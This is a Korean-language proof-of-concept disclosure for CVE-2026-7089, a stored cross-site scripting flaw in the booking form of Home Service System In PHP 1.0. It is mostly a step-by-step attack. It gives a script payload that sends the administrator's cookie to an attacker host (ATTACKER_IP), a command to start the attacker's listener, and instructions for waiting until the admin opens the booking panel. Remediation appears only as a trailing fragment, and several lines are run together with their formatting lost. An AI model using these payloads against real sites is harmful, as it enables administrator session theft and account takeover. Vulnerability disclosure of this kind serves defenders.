
# CVE-2026-7089 개념 증명 — Home Service System PHP 1.0의 저장형 XSS로, 예약 양식을 통한 인증되지 않은 관리자 세션 하이재킹을 허용합니다.
| 필드 | 세부 정보 |
|---|
| 공급업체 | code-projects.org |
| 제품 | Home Service System In PHP |
| 버전 | 1.0 |
| 취약점 유형 | 저장형 크로스 사이트 스크립팅 (XSS) |
| CWE | CWE-79 |
| 인증 필요 여부 | 아니요 |
| 작성자 | Imad Alvi |
Home Service System In PHP 1.0의 booking.php 파일에 저장형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 인증되지 않은 사용자는 예약 양식 필드를 통해 악성 JavaScript 페이로드를 주입할 수 있습니다. 삭제되지 않은 입력은 데이터베이스에 저장되며 관리자 패널(admin.php)에서 출력 인코딩 없이 렌더링되어 관리자의 브라우저 컨텍스트에서 실행됩니다.
이를 통해 인증되지 않은 공격자가 관리자 세션 쿠키를 탈취하고, 관리자를 대신하여 작업을 수행하거나, 관리자 계정을 완전히 장악할 수 있습니다.
booking.phpfname, lnameadmin.php → 예약 관리인증되지 않은 사용자로 예약 페이지에 접속합니다: http://TARGET/homeservices/booking.php?provider=
이름(First Name) 필드에 다음 페이로드를 주입합니다:
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
나머지 필드를 유효한 데이터로 채우고 예약을 제출합니다.
공격자 머신에서 리스너를 시작합니다:
php -S 0.0.0.0:PORT
관리자가 admin.php의 예약 관리 섹션을 방문할 때까지 기다립니다.
페이로드가 관리자의 브라우저에서 실행되어 세션 쿠키를 리스너로 유출합니다.

<script>alert(1)</script>

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>
이 취약점으로 인해 원격의 인증되지 않은 공격자가 애플리케이션을 완전히 장악할 수 있습니다.
공격자는 다음을 수행할 수 있습니다:
PHPSESSID 세션 쿠키 탈취ENT_QUOTES와 함께 htmlspecialchars() 적용